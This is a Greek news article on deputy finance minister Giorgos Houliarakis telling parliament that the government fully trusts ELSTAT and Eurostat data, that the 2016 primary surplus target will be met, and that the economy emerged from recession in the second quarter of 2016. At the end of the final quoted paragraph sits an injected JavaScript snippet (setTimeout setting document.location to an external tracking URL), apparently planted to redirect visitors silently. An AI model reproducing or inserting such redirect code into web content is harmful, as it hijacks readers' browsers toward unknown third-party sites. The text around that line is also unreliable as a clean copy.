Χουλιαράκης: Η κυβέρνηση έχει πλήρη εμπιστοσύνη στην ΕΛΣΤΑΤ και τη Eurostat

0
4

 

Μιλώντας στην Ολομέλεια της Βουλής ο αναπληρωτής υπουργός Οικονομικών Γιώργος Χουλιαράκης αναφέρθηκε στο θέμα που προέκυψε με την ΕΛΣΤΑΤ, σχολιάζοντας ότι μετά τη συμφωνία του περσινού καλοκαιριού υπάρχουν οι εγγυήσεις και προστατεύεται η ανεξαρτησία της.

Όπως είπε χαρακτηριστικά: «Η κυβέρνηση έχει πλήρη εμπιστοσύνη στα στοιχεία της ΕΛΣΤΑΤ και της Eurostat. Η συμφωνία του Ιουνίου εγγυάται και προστατεύει την ανεξαρτησία της ΕΛΣΤΑΤ».

Ο αναπληρωτής υπουργός Οικονομικών ανακοίνωσε, πως το τρέχον οικονομικό έτος 2016 θα κλείσει με το πρωτογενές πλεόνασμα που προβλέπεται και επισήμανε, πως η υπέρβαση του πλεονάσματος θα «επιστραφεί» στην οικονομία ως ένεση ρευστότητας.

Έσπευσε, ωστόσο, να υπογραμμίσει ότι η κυβέρνηση δεν πανηγυρίζει αλλά εργάζεται για την ανάκαμψη, την ανάπτυξη και την προσέλκυση επενδύσεων και προωθεί θεσμικές τομές στην αγορά και την Οικονομία.

«Η ελληνική οικονομία βγήκε από την ύφεση το δεύτερο τρίμηνο του 2016.«Δεν μπορεί να πανηγυρίζουμε όταν η οικονομία παραμένει σε στασιμότητα, έστω και μετά από μία βαθιά ύφεση» είπε ο αναπληρωτής υπουργός Οικονομικών και σχολίασε αναφορικά με τη στάση της αξιωματικής αντιπολίτευσης ότι «πρέπει να φέρεται πιο υπεύθυνα και να μην υποστηρίζει ότι βαθαίνει η ύφεση».

«Η πρόβλεψη πολλών διεθνών ιδιωτικών φορέων ήταν στην αρχή του χρόνου για ύφεση 1,5% – 2%. Και η ΕΛΣΤΑΤ προέβλεπε ύφεση 1,2% στο εξάμηνο. Όμως η οικονομία αποδείχθηκε πολύ πιο ανθεκτική και η ύφεση στο εξάμηνο ήταν 0,9%», παρατήρησε. Προσέθεσε δε ότι «Η εικόνα της οικονομίας είναι συμβατή με την πρόβλεψη του υπουργείου Οικονομικών για τέλος της ύφεσης στο μέσο του 2016 και αρχή ανάκαμψης. Είναι εικόνα που πρέπει να οδηγήσει σε εφησυχασμό; Αναμφίβολα όχι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here